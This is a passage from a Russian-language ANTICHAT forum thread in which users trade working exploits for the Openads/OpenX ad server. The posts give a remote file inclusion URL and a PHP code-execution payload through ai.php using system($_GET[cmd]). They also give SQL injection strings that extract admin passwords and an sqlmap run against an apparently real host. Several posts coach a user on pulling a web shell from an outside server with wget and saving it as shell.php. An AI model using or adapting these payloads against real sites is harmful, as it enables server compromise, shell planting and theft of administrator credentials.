HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 04.09.2011, 19:49
S1ash
Новичок
Регистрация: 19.11.2007
Сообщений: 23
Провел на форуме:
147347

Репутация: 0
По умолчанию

2.0.11 RFI

http://www.site.com/Openads-2.0.11/libraries/lib-view-main.inc.php?row=http://evil.txt?
 
Ответить с цитированием

  #22  
Старый 29.09.2011, 18:30
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110

Репутация: 133
Отправить сообщение для MaSTeR GэN с помощью ICQ
По умолчанию

openx 2.8.7 exploit



openx 2.8.7


Хз нашел вчера мало полезно но хоть что то скуля в админке Слепая как крот

http://test.com/www/admin/updates-history.php

POST_data:

Цитата:
Сообщение от None  
btn_clean_audit=Delete+Artifacts&upgrade_action_id =7{SQLINJ}
P.S Чуток покурил маны мускла склуля не слепая вывод есть
 
Ответить с цитированием

  #23  
Старый 21.11.2011, 07:48
gabarea
Новичок
Регистрация: 30.03.2010
Сообщений: 2
Провел на форуме:
21162

Репутация: 0
По умолчанию

sqlmap -u "http://admin.oads.vimg.net/www/admin/updates-history.php" --method "POST" --data "btn_clean_audit=Delete+Artifacts&upgrade_action_i d=7" --dbs

[04:44:20] [INFO] testing connection to the target url

[04:44:21] [INFO] testing if the url is stable, wait a few seconds

[04:44:24] [INFO] url is stable

[04:44:24] [INFO] testing if POST parameter 'btn_clean_audit' is dynamic

[04:44:25] [WARNING] POST parameter 'btn_clean_audit' is not dynamic

[04:44:25] [INFO] testing if POST parameter 'upgrade_action_id' is dynamic

[04:44:25] [WARNING] POST parameter 'upgrade_action_id' is not dynamic

[04:44:25] [INFO] testing if Cookie parameter 'sessionID' is dynamic

[04:44:26] [WARNING] Cookie parameter 'sessionID' is not dynamic

[04:44:26] [INFO] testing if Cookie parameter 'OAGEO' is dynamic

[04:44:27] [WARNING] Cookie parameter 'OAGEO' is not dynamic

[04:44:27] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic

[04:44:27] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[*] shutting down at: 04:44:27

не работает
 
Ответить с цитированием

  #24  
Старый 26.11.2011, 07:52
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110

Репутация: 133
Отправить сообщение для MaSTeR GэN с помощью ICQ
По умолчанию

Во первых желательно авторизоватся )))

А дальше xakep.ru/post/52222/default.asp - курить сдесь )
 
Ответить с цитированием

  #25  
Старый 14.12.2011, 17:05
nevermore
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от (Dm)  
(Dm) said:
[ + ] Уязвимости Openads 2.4.0 - 2.4.2
>> Выполнение php кода
сплоит:
Цитата:
http://host/www/delivery/ai.php?filename=antichat.jpg';system($_GET[cmd]);/*&contenttype=antichat&cmd=ls -la
Помогите с заливкой шелла. Нашел данную уязвимость.

Код:
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=ls -la
выполняется

Код:
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=whereis wget
выполняется

Код:
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=wget http://site2.ru/shell.txt
не выполняется

пробовал аналогично и fetch, и curl - не хочет заливать.

также пробовал указать адрес site2.ru без http, пробовал закодировать в ascii, в base64 и т.д.

Как залить шелл?
 
Ответить с цитированием

  #26  
Старый 15.12.2011, 23:25
FlooP1k
Guest
Сообщений: n/a
Провел на форуме:
30137

Репутация: 48
По умолчанию

Цитата:
Сообщение от nevermore  
nevermore said:
Помогите с заливкой шелла. Нашел данную уязвимость.
Код:
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=ls -la
выполняется
Код:
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=whereis wget
выполняется
Код:
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=wget http://site2.ru/shell.txt
не выполняется
пробовал аналогично и fetch, и curl - не хочет заливать.
также пробовал указать адрес site2.ru без http, пробовал закодировать в ascii, в base64 и т.д.
Как залить шелл?
может там нет права на запись? ну или попробуй:

wget http://sait.ru/shell.txt -O /home/polniu put' do papki/shell.php

Пусть можно легко узнать с помощью pwd
 
Ответить с цитированием

  #27  
Старый 19.01.2012, 17:56
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Раскрытие путей, тестил на OpenX 2.8.7, 2.8.8

Exploit:

Код:
Code:
http://openx/www/delivery/dxmlrpc.php
P.S. Сегодня выручила
 
Ответить с цитированием

  #28  
Старый 25.01.2012, 15:43
Sadiel
Guest
Сообщений: n/a
Провел на форуме:
1216

Репутация: 0
По умолчанию

sql injection

Код:
Code:
http://site.ru/www/delivery/ac.php?bannerid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_w s(0x3a,p.admin,p.admin_pw),19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38 from ox_preference p, ox_banners d, ox_campaigns c WHERE p.agencyid=0
версия openx 2.4.4

Данная уязвимость не выполняется. Пробовал на других сайтах и другие версии (2.6.0).

Подскажите пожалуйста как правильно ее использовать.
 
Ответить с цитированием

  #29  
Старый 26.01.2012, 20:23
Iggy
Guest
Сообщений: n/a
Провел на форуме:
26362

Репутация: 1
По умолчанию

Цитата:
Сообщение от Sadiel  
Sadiel said:
sql injection
Код:
Code:
http://site.ru/www/delivery/ac.php?bannerid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_w s(0x3a,p.admin,p.admin_pw),19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38 from ox_preference p, ox_banners d, ox_campaigns c WHERE p.agencyid=0
версия openx 2.4.4
Данная уязвимость не выполняется. Пробовал на других сайтах и другие версии (2.6.0).
Подскажите пожалуйста как правильно ее использовать.
может префиксы другие, или таблицы старые! раскручивай просто как инъекцию, а не этому шаблону!

если нет то кидай сцыль
 
Ответить с цитированием

  #30  
Старый 26.01.2012, 23:05
Sadiel
Guest
Сообщений: n/a
Провел на форуме:
1216

Репутация: 0
По умолчанию

Да, все понял, префиксы везде разные.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей RunCMS ] Solide Snake Веб-уязвимости 43 07.07.2012 02:09
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей #osCommerce# ] life_is_shit Веб-уязвимости 9 10.11.2009 17:43
Обзор уязвимостей движка трекера TBSource. Arigona Веб-уязвимости 1 28.12.2008 14:42



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ